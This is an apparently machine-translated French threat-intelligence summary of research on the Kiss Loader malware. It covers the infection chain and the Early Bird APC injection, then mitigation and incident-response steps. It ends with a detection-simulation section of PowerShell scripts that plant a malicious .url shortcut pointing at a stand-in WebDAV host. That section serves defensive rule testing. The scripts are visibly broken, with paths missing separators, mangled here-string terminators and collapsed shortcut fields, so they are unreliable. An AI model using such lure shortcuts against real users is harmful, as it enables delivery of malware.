Quand les logiciels malveillants répondent : interaction en temps réel avec un acteur de la menace lors de l’analyse de Kiss Loader

Résumé

Recherche par G DATA Security Center examine un chargeur nouvellement identifié nommé Kiss Loader. L’article examine un chargeur nouvellement identifié nommé Kiss Loader, distribué via un raccourci Windows qui pointe vers un dépôt WebDAV exposé via un tunnel TryCloudflare. Une fois lancé, le chargeur décrypte le shellcode généré par Donut, récupère des charges utiles telles que VenomRAT et un composant Kryptik, et les exécute par injection Early Bird APC dans explorer.exe. Lors de l’analyse, le chercheur a été en interaction directe avec l’opérateur du malware via une fenêtre Notepad, confirmant l’utilisation de la méthode d’injection Early Bird. Le cas souligne l’évolution rapide de l’outil et la nécessité d’une forte contenance lors de la manipulation de malwares actifs.

Enquête

Les chercheurs ont déclenché le raccourci initial dans un laboratoire contrôlé et ont tracé la chaîne d’exécution à travers un script WSH, un composant JScript, des fichiers batch, et un chargeur basé sur Python. Ils ont confirmé l’utilisation du shellcode généré par Donut, extrait les charges utiles intégrées, et documenté la méthode d’injection finale, qui enfile un APC dans un explorer.exe processus suspendu. Tout au long de la session, l’équipe a capturé la sortie d’exécution détaillée et les messages laissés par les développeurs à l’intérieur du flux du malware. Un court échange en temps réel avec l’opérateur a également confirmé à la fois la technique et l’état de développement actif du chargeur.

Atténuation

Les organisations devraient restreindre ou inspecter le trafic WebDAV délivré via des plateformes de tunneling public telles que TryCloudflare, désactiver l’exécution automatique des .url fichiers de raccourci, et appliquer des contrôles d’exécution stricts aux scripts et fichiers batch dans les chemins de démarrage accessibles aux utilisateurs. Les défenses des points de terminaison devraient détecter le comportement d’injection Early Bird APC et surveiller les processus suspendus recevant des APC en file d’attente. Les listes d’autorisation d’applications doivent également être tenues à jour pour bloquer les chargeurs Python inconnus et le shellcode basé sur Donut.

Réponse

Si l’activité de Kiss Loader est détectée, isolez immédiatement le point de terminaison, terminez les explorer.exe processus suspects démarrés dans un état suspendu, et capturez la mémoire pour une révision judiciaire. Les enquêteurs devraient identifier et bloquer l’infrastructure WebDAV associée, scanner l’hôte pour VenomRAT, Kryptik, et toutes autres charges utiles déposées, et remplacer les informations d’identification potentiellement exposées. Les journaux devraient ensuite être vérifiés pour d’autres tentatives d’intrusion, et les règles de détection mises à jour avec tous les indicateurs nouvellement observés.

Exécution de la simulation

Condition préalable : Le pointage de télémétrie et de base proposé doit avoir réussi.

• Narrative & commandes d’attaque :
  Un attaquant avec un accès limité à la station de travail de la victime souhaite établir une base pour un mouvement latéral. Ils élaborent un raccourci Internet Windows malveillant nommé DKM_DE000922.pdf.url qui pointe vers un partage WebDAV malveillant (http://malicious.example.com/webdav/evil.pdf). Lorsqu’un utilisateur double-clique sur le raccourci, le système tente automatiquement de monter la ressource WebDAV, amenant la victime à télécharger la charge utile sans exécuter un binaire traditionnel. La création de ce raccourci génère un événement de création de fichier qui correspond à la règle de détection.

  powershell
  # Chemin où le raccourci sera déposé (par exemple, le Bureau de l'utilisateur)
  $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"
  
  # Contenu du fichier .url malveillant pointant vers un partage WebDAV
  $maliciousContent = @"

  [InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 « @

  # Écrivez le fichier – cette action devrait déclencher la règle de détection
  Set-Content -Path $maliciousPath -Value $maliciousContent -Encoding ASCII
  

• Script de test de régression : Le script ci-dessous reproduit les étapes exactes nécessaires pour générer la télémétrie déclenchant la détection.

  powershell
  # ---------------------------------------------------------
  # Test de régression – Déclencher la règle Sigma pour les fichiers WebDAV .url
  # ---------------------------------------------------------
  
  # 1. Définir l'emplacement cible (bureau pour l'utilisateur actuel)
  $targetFile = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"
  
  # 2. Construire le contenu du raccourci malveillant
  $urlPayload = @"

  [InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 « @

  # 3. Écrire le raccourci (cela déclenchera un événement FileCreate)
  Set-Content -Path $targetFile -Value $urlPayload -Encoding ASCII
  
  Write-Host "Raccourci .url malveillant créé à $targetFile"
  

• Commandes de nettoyage : Supprimer le raccourci malveillant après vérification.

  powershell
  $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"
  if (Test-Path $maliciousPath) {
      Remove-Item -Path $maliciousPath -Force
      Write-Host "Raccourci malveillant nettoyé."
  } else {
      Write-Host "Aucun raccourci malveillant trouvé; rien à nettoyer."
  }